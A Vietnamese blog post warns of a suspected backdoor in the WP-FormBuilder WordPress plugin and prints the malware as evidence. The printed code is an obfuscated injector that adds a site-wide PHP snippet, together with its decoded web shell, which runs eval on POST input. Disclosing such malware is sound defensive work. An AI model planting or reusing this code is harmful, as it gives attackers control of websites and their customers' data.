![[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcl178I-GvRFOlVDHBNs5uzpWA4st5lPlIeUK-FTJuhNEGv_Za-hJRtreCn_b__L3rLszd5N_D35vnL9LhclnsBzdvO7JQkkVS9-lRSyRkQcE3fP6exgzsKN8O3r7kyUd1F7NcaTSIYnCwzcC9NXMw2OXKbMwekJhjhihub8itNfmClWYzFE0akccxi9Q/s960/backdoor-tren-formbuilder.png "[Waring] Nghi Vấn BackDoor Trên WP-FormBuilder")
facebook mình thấy có bài viết CẢNH BÁO: NGHI VẤN BACKDOOR TRÊN WP-FormBuilder cũng khá hay và đọc kỹ thấy cũng nguy hiểm với những trang buôn bán, rất dễ bị tin tặc tấn công kiểm soát ngân hàng khi người dùng mua bán trên trang.⚠️ Dấu hiệu: Nếu thấy file' wp-codiey.php' trong folder plugin, website bạn đã dính backdoor. File này nhìn bình thường nhưng có khả năng inject mã độc chiếm toàn quyền kiểm soát website. Thoạt nhìn nội dung file trông hoàn toàn bình thường, nhưng nó sẽ inject 1 đoạn code custom code vào plugin "
insert-headers-and-footers" để chèn mã độc vào tất cả các trang của website:
function updateSnippets()
{
require_once WP_PLUGIN_DIR . "/insert-headers-and-footers/includes/class-wpcode-generator.php";
$new_snippet = new WPCode_Snippet((int)$_GET["id"]);
$new_snippet->active = true;
$new_snippet->location = 'everywhere';
$new_snippet->auto_insert = 1;
$new_snippet->code_type = 'php';
$new_snippet->tags = array();
$new_snippet->code = hex2bin(base64_decode(str_replace("vxsafAS*vasjw","",'Njk2NjIwMjg2OTczNzM2NTc0MjgyNDVmNTA0vxsafAS*vasjwZjUzNTQ1YjI3NjY3NDcwMjc1ZDI5Mjk3YjBhMjAyMDIwMjA2NTc2NjE2YzI4NDA2ODY1NzgzMjYyNjk2ZTI4MjQ1ZjvxsafAS*vasjwUwNGY1MzU0NWIyNzY2NzQ3MDI3NWQyOTI5M2IwYTIwvxsafAS*vasjwMjAyMDIwNjU3ODY5NzQyODI5M2IwYTdk')));
$new_snippet->save();
}
Decode ra kết quả như sau:
if (isset($_POST['ftp'])){
eval(@hex2bin($_POST['ftp']));
exit();
}
p/s: detect mã độc tinh vi này bằng tool Vietnix Malware Scanner - Công cụ scan mã độc bằng Machine Learning sắp tới sẽ được release chính thức trên các cụm Hosting của Vietnix.
![[Csharp] Cách chia tệp PDF thành nhiều tệp dễ dàng](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uDUMVko6IDhuuf1FArrBbkzhvEER3WMWJNBH791q8v4Q5sBe1pdClcflPdPr8voINWWoUMmfHUOxscbc_56IlcHD6ZqgGRuqkuG-owHQog5zeJ7rwfvRmwwSsKRUaTJhvDuPS6oG0x2OtJAB02DVYoUfzh6iCTqDvxaPqpxoTZ0PHWfoN1CdgDTt8eMjQ1-E_w6TjC9rVd82vZ67M3Bg1g8IRRcvuxoBvz1-Hr29AdPhDar8oLe3mmKqaPNxQkPuFc22OwhgjnWQEjrQGm4INWKSSbsaQzeie3revtYPjB1_MuX3NaGG4NUKLI5OCnMALzdaYARm2OFhbMTE2cPLB12L2plpQazNSdc8XH72OFJRlltgGV-mCAtjfbDaLhUHv7Ct3dmg=w72-h72-p-k-no-nu)
🚫 Không spam, không chèn link quảng cáo, bán hàng.
❌ Không sử dụng từ ngữ thô tục, xúc phạm, kích động.
🔗 Link chỉ được phép khi thực sự liên quan đến nội dung bài viết.
👤 Không mạo danh người khác hoặc sử dụng email giả.
🛑 Bình luận vi phạm sẽ bị xóa không cần thông báo trước.
⑴ Chèn ℂ𝕤𝕤 theo mẫu : [pre css] ℂ𝕤𝕤 [/pre]
⑵ Chèn ℍ𝕥𝕞𝕝 theo mẫu : [pre html] ℍ𝕥𝕞𝕝 [/pre]
⑶ Chèn 𝕁𝕒𝕧𝕒𝕤𝕔𝕣𝕚𝕡𝕥 theo mẫu : [pre js] 𝕁𝕒𝕧𝕒𝕤𝕔𝕣𝕚𝕡𝕥 [/pre]
🖼️ Chèn 𝕀𝕞𝕒𝕘𝕖 theo mẫu : [img] 𝕃𝕚𝕟𝕜 𝕀𝕞𝕒𝕘𝕖 [/img]
🎞️ Chèn Video 𝕐𝕠𝕦𝕥𝕦𝕓𝕖 theo mẫu : [youtube] 𝕃𝕚𝕟𝕜 𝕪𝕠𝕦𝕥𝕦𝕓𝕖 [/youtube]
3 Comments
This comment has been removed by the author.
ReplyDeletehi bạn, mình không phải bên mãng kỹ thuật, mình bên kinh doanh nên việc đấu dây thế nào mình không rỏ bạn nhé.
Deletehttps://www.youtube.com/watch?v=AiK_0-xiI7Q
ReplyDelete